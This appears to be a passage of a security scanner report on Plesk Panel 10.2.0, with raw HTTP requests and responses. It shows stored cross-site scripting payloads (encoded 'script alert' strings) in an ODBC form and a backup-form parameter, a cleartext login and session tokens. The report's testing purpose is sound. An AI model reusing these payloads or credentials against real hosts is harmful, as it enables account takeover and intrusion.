<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"ODBC data sources","href":"\/plesk\/client@2\/domain@1\/odbc\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5. Cookie without HttpOnly flag set  previous  next
There are 36 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://vulnerable.plesk.control.panel.20110407.20:8880/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:21:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=dba661f53b2a81d0d08fcba319a6f6fa; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:21:35 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.2. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /javascript/chk.js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascript/chk.js.php?1302230642 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/create/?forgery_protection_token=48333f77aef379c04c82252b59636182&cmd=update&lock=true&previous_page=%0d&wizaction=%0d&prefix=bak&comment=Domain++backup.%0d%0aCreation+date%3a+May+23%2c+2011+02%3a39+PM&split_backup=false&repository=local&email=%0da42c4%22%3e%3cscript%3ealert%281%29%3c%2fscript%3ee3e36e04876dbfe97&content=configuration_and_content&content_type=backup_content_all_at_domain&suspend=false
Cookie: locale=en-US; psaContext=dashboard
If-None-Match: "1306181630-544bdaf6dd2753ce86a143b36e3245b8-en-US"

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1306183953-b3b1e789775ef43338d64c59c3e1dc01-en-US"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=b3b1e789775ef43338d64c59c3e1dc01; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:52:33 GMT
Connection: close
Content-Length: 8894

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z\-_.\/~@!\+=\^\(\)\[\]\{\}, ]+$/;
   // forbid // and ^. and /. and .$ and ./
   re1 = /(\/\/|^\.|\.$|\/\.|\.\/|\/ | \/)/;
   return (dir.search(re) != -1) && (dir.search(re1) == -1);
}

function chk_db_name(db)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9-_]{0,63}$/;
   return db.search(re) != -1;
}

function chk_db_usr_name(usr, type)
{
   if (type == 'mssql')
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,127}$/;
   else
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,15}$/;
   return usr.search(re) != -1;
}

function chk_pos_int(pos_int)
{
   re = /^\s*[1-9]{1}[0-9]*\s*$/;
   return pos_int.search(re) != -1;
}

function chk_sys_login(nm)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,14}$/;
   return nm.search(re) != -1;
}

function chk_mn(mail_name)
{
   re = /^([A-Za-z0-9_\-])+((\.){1}([A-Za-z0-9_\-])+)*$/;
   return mail_name.search(re) != -1;
}

function chk_resp_name(resp_name)
{
   return ((resp_name.length > 0) && (resp_name.length <= 245));
}

function chk_login(login)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,254}$/;
   return login.search(re) != -1;
}

function chk_realm(realm)
{
   re = /^[^\"]*$/;
   return realm.search(re) != -1;
}

function chk_dom(dom_name)
{
   if ('' == dom_name)
       return false; // check empty value

   if ('localhost.rev' == dom_name)
       return false;

   inaddr = /\.in-addr.arpa$/;
   if (dom_name.search(inaddr) != -1)
       return false;

   if (chk_ip(dom_name))    // no domain name like IP address
       return false;

   dotd = /\.d$/;
   if (dom_name.search(dotd) != -1)
       return false;

   return true; // IDN support
   /*
   nore = /\.$/;
   re = /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}){1,}$/;

   return (dom_name.search(nore) == -1) && dom_name.match(re);
   */
}

function chk_subdom(dom_name)
{
   return true; // IDN support
   /*
   re = /^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*$/;
   return dom_name.search(re) != -1;
   */
}

function chk_email(email)
{
   re = /^([^\@]+){1}\@([^\@]+){1}$/;
   found = email.match(re);
   if (!found)
       return false;
   return chk_mn(found[1]) && chk_dom(found[2]);
}

function chk_url(url)
{
   re = /^((http[s]?|ftp):\/\/)?([^\/:]+)(:\d{1,5})?(\/[^\s\"\'`]*)?$/i;
   found = re.exec(url);
   if (!found)
       return false;

   return chk_dom(found[3]);
}

function chk_ip(ip)
{
   return chk_ip_address_and_mask(ip, 4, 8);
}

function chk_dom_t(hst)
{
re = /^((<domain>|[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*)(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*|\.<domain>)+|<domain>)$/;
return hst.match(re);
}

function chk_ip_t(ip)
{
   re = /^<ip>$/;
   return chk_ip(ip) || ip.match(re);
}

function chk_mask(mask)
{
   re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   found = mask.match(re);
   if (!found)
       return false;
   var i = found.length - 1;
   while (i && (found[i] == 0)) i--;
   if (!i)
       return true;
   if (
       (found[i] != 128) &&
       (found[i] != 192) &&
       (found[i] != 224) &&
       (found[i] != 240) &&
       (found[i] != 248) &&
       (found[i] != 252) &&
       (found[i] != 254) &&
       (found[i] != 255)
   )
       return false;
   i--;
   while (i && (found[i] == 255)) i--;

   return i == 0;
}

function ip2long(str)
{
   var num = 0;
   var re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   found = str.match(re);
   if (!found)
       return null;
   for (var i = 0; ++i < found.length; ) {
       num <<= 8;
       num |= found[i];
   }
   return num;
}

// convert ip block mask to int32 mask
function block_to_num(block)
{
   num = 0;
   for (var i = 0; i < 32; i++) {
       num <<= 1;
       num |= (block > i ? 1 : 0);
   }
   return num;
}

// check ip address and mask by valid rules
function chk_ip_address_and_mask(ip, valid, valid_formats)
{
   var ip_address_mask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.\*|)|\.\*\.\*|\.\*|)|\.\*\.\*\.\*|\.\*\.\*|\.\*|)()$/;
   var ip_address_block_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,2})$/;
   var ip_address_netmask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   var ip_address_format = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   if (!valid)
       valid = 7;
   if (!valid_formats)
       valid_formats = 15;

   var found;
   var ip_address = null;
   var ip_mask = null;

   if (
       (valid_formats & 1) &&
       (found = ip.match(ip_address_mask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255))
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long((found[1] ? 255 : 0) + '.' + (found[3] ? 255 : 0) + '.' + (found[5] ? 255 : 0) + '.' + (found[7] ? 255 : 0));
   } else if (
       (valid_formats & 2) &&
       (found = ip.match(ip_address_block_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 32)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = block_to_num(found[8]);
   } else if (
       (valid_formats & 4) &&
       (found = ip.match(ip_address_netmask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 223)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 255) &&
       (found[9] >= 0 && found[9] <= 255) &&
       (found[10] >= 0 && found[10] <= 255) &&
       (found[11] >= 0 && found[11] <= 255)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long(found[8] + '.' + found[9] + '.' + found[10] + '.' + found[11]);
   } else if (
       (valid_formats & 8) &&
       (found = ip.match(ip_address_format)) &&
       (found[1] >= 0 && found[1] <= 255) &&
       (found[2] >= 0 && found[2] <= 255) &&
       (found[3] >= 0 && found[3] <= 255) &&
       (found[4] >= 0 && found[4] <= 255)
   ) {
       ip_address = ip2long(found[1] + '.' + found[2] + '.' + found[3] + '.' + found[4]);
       ip_mask = block_to_num(32);
   }

   if (null == ip_address || null == ip_mask)
       return false;

   return ((valid & 1) && //network block
               ((ip_address & ip_mask) == ip_address)
       ) ||
       ((valid & 2) && // ip address with netmask
           ip_address && ip_mask &&
               (
                   ((ip_address & ~ip_mask) && // and not empty lower bits
                   ~((ip_address & ~ip_mask) | ip_mask) // minimum network size 'may be removed - bcause added single addres networks by client request ...
               ) || (ip_mask == block_to_num(32))
           ) // or single ip address
       ) ||
       ((valid & 4) && //sigle ip address
           ip_address && (ip_mask == block_to_num(32)) // not empty ip address and 0xFFFFFFFF ip mask
       );
}

function chk_ip_mask(ip, mask)
{
   if (!chk_ip(ip) || !chk_mask(mask))
       return false;

   var num_ip;
   var num_mask;

   if ((num_ip = ip2long(ip)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   // check ip/mask combination for interface:
   // 1) mask not null
   // 2) host part not null (num_ip & ~num_mask)
   // 3) host part not all 1 ~((num_ip & ~num_mask) | num_mask)
   return num_mask && (((num_ip & ~num_mask) && ~((num_ip & ~num_mask) | num_mask)) || (mask == '255.255.255.255'));
}

function chk_net_mask(net, mask)
{
   if (!chk_ip(net) || !chk_mask(mask))
       return false;

   var num_net;
   var num_mask;

   if ((num_net = ip2long(net)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   return num_mask && (num_net & num_mask) && ((num_net & num_mask) == num_net);
}

function chk_sys_passwd(username, passwd)
{
   if ((passwd.length < 4) || (passwd.length > 255))
       return false;

   if (passwd.length >= username.length) {
       if (passwd.indexOf(username, 0) != -1)
           return false;
   }

   if ((passwd.indexOf('\'') != -1) || (passwd.indexOf(' ') != -1))
       return false;

   for (var i = passwd.length; i-- > 0;) {
       if (passwd.charCodeAt(i) > 127)
           return false;
   }

   return true;
}

function chk_filename(filename)
{
   re = /^[^\']*$/;
   return filename.search(re) != -1;

}

function chk_uint(uint)
{
   re = /^[0-9]+$/;
   found = uint.match(re);
   if (!found) {
       return false;
   }

   return true;
}

5.3. http://vulnerable.plesk.control.panel.20110407.20:8880/login_up.php3  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /login_up.php3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login_up.php3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/login_up.php3
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US; PLESKSESSID=dba661f53b2a81d0d08fcba319a6f6fa
Content-Length: 61

login_name=xsscx&passwd=LL12345%21%21&locale_id=default&send=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:21:48 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Plesk: PSA-Key/PLSK015474560000
Set-Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; path=/
Set-Cookie: locale=en-US; expires=Tue, 22-May-2012 18:21:48 GMT; path=/
Set-Cookie: no_frames=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_root_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_login_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_logout_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:21:48 GMT
Connection: close
Content-Length: 1251


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/smb/';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/smb/" target="top">/smb/</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/user/create HTTP/1.1
